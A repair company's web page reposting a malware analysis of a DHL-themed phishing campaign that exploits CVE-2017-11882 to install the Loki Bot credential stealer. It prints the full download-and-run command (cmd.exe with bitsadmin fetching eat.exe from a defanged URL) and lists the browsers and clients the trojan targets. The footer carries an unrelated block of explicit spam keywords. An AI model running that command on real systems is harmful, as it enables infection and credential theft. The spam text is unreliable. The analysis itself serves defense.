錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
中國進出口企業遭遇“商貿信”攻擊,企業機密被竊取

作者: 佚名  日期:2018-06-07 14:57:02   來源: 本站整理

 0×1 背景
騰訊御見威脅情報中心監測發現,近期針對中國進出口企業的網絡攻擊再次抬頭。黑客攻擊的目標是中國電子科技、外貿、遠洋運輸企業,攻擊者發送精心準備的與企業業務相關的誘餌郵件,附件是利用Office漏洞(漏洞編號:CVE-2017-11882)特別定制的攻擊文檔,存在漏洞的電腦上打開附件會立刻中毒。漏洞觸發后利用bitsadmin下載Loki Bot木馬并執行,然后竊取受害人員各類賬號密碼等機密信息。
2017年12月5號,騰訊安全御見情報中心曾發布預警:一款針對外貿行業的“商貿信”病毒,將利用CVE-2017-11882漏洞的Word文檔偽裝成采購清單、帳單等文件,通過郵件在全球外貿行業內大量傳播,僅一天時間國內就有約10萬多國內用戶收到此類釣魚郵件。
2018年2月26日捕獲到doc文檔樣本通過下載并運行已被公開源碼的“波尼”木馬,竊取用戶比特幣錢包文件等敏感信息,這些攻擊文檔同樣利用了CVE-2017-11882漏洞。
最新的攔截數據表明,此類定向投放到中國進出口企業的攻擊郵件每天有上千封之多,病毒變種也層出不窮。騰訊安全專家建議中國進出口相關企業務必高度警惕,采用必要的防御措施防止企業機密信息泄露。
攻擊流程:

0×2 具體分析
誘餌郵件為偽裝成國際物流公司DHL發出的寄件包裹確認信。對于運輸業的從業人員而言,此類郵件有相當高的誘導性,很容易被認定為運輸合作伙伴的信件。

內容直譯:

附件doc內容:
 提示“Loading…”

空白圖表

打開郵件doc文檔,觸發CVE-2017-11882漏洞,執行命令行
cmd.exe /c bitsadmin /transfer Fq /priority foreground hxxp://internationalcon.com/ar/home/eat.exe %USERPROFILE%/iWa.exe && start %USERPROFILE%/iWa.exe
bitsadmin.exe 可以用來在windows 命令行下下載文件,是windows 后臺智能傳輸服務的一個工具,windows也會使用它來進行自動更新、下載補丁,此工具在黑客滲透攻擊中也較為流行。

訪問internationalcon.com發現該地址為阿聯酋沙迦的某國際建筑設計公司網站,疑似被黑客攻擊利用。

下載的exe樣本采用aPLib加殼。nlo.exe為.net版;eat.exe為Delphi版,脫殼后都是“Loki Bot”木馬。


“Loki Bot”是在地下網站上銷售的商業惡意軟件,功能為從受感染機器竊取私人數據,然后通過HTTP POST將該信息提交給控制主機。這些私人數據包括存儲的密碼,Web瀏覽器的登錄憑證信息,以及各種加密貨幣錢包等。

裝載功能:
啟動(常駐裝載機)
下載并運行(exe | dll)
下載和投遞
更新木馬
卸載木馬
根據請求從控制端獲取密碼
加載到選定的國家
設置重新連接間隔
獲取截圖
支持的瀏覽器:
Internet Explorer
Mozilla Firefox (x32+x64)
Google Chrome
KMeleon
Comodo Dragon
Comodo IceDragon
SeaMonkey
Opera
Safari
CoolNovo
Rambler Nichrome
RockMelt
Baidu Spark
Chromium
Titan Browser
Torch Browser
Yandex.Browser
Epic Privacy Browser
Sleipnir Browser
Vivaldi
Coowon Browser
Superbird Browser
Chromodo Browser
Mustan Browser
360 Browser
Cyberfox (x32+x64)
Pale Moon
Maxthon browser
Citrio Browser
Chrome Canary
Waterfox
Orbitum
Iridium
支持的 FTP/VNC 客戶端:
Total Commander
FlashFXP
FileZilla
FAR Manager
CyberDuck
Bitvise
NovaFTP
NetDrive
NppFTP
FTPShell
SherrodFTP
MyFTP
FTPBox
FtpInfo
Lines FTP
FullSync
Nexus File



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 西西午夜无码大胆啪啪国模 | 波多野结AV衣东京热无码专区| 免费无码VA一区二区三区| 精品欧洲av无码一区二区| 精品久久久久久无码人妻中文字幕| 曰韩无码无遮挡A级毛片| 亚洲av无码专区在线播放| 国外AV无码精品国产精品| 久久99精品久久久久久hb无码| 免费无码又爽又黄又刺激网站| 日韩精品久久无码人妻中文字幕| 亚洲精品无码久久久| 亚洲av无码专区在线电影天堂| 国产亚洲人成无码网在线观看| 人妻无码一区二区三区| 免费无码A片一区二三区| 久久久久亚洲AV无码专区首| 亚洲?v无码国产在丝袜线观看| 久久国产亚洲精品无码| 亚洲爆乳无码一区二区三区| 国产精品无码不卡一区二区三区| 亚洲成a∧人片在线观看无码| 久久老子午夜精品无码 | 亚洲男人在线无码视频| 无码H黄肉动漫在线观看网站| 亚洲AV无码欧洲AV无码网站| 国产成人无码精品久久久久免费| 精品少妇人妻AV无码专区不卡| 日韩人妻无码精品一专区| 久久亚洲AV无码西西人体| 嫩草影院无码av| 亚洲AV中文无码乱人伦| 无码人妻少妇久久中文字幕| 性色av无码不卡中文字幕| 精品人妻无码一区二区三区蜜桃一 | 亚洲成AV人片天堂网无码| 亚洲国产精品无码久久一区二区| 亚洲午夜无码久久久久| 久久无码av三级| 精品无码人妻一区二区三区| 成人无码区免费A片视频WWW|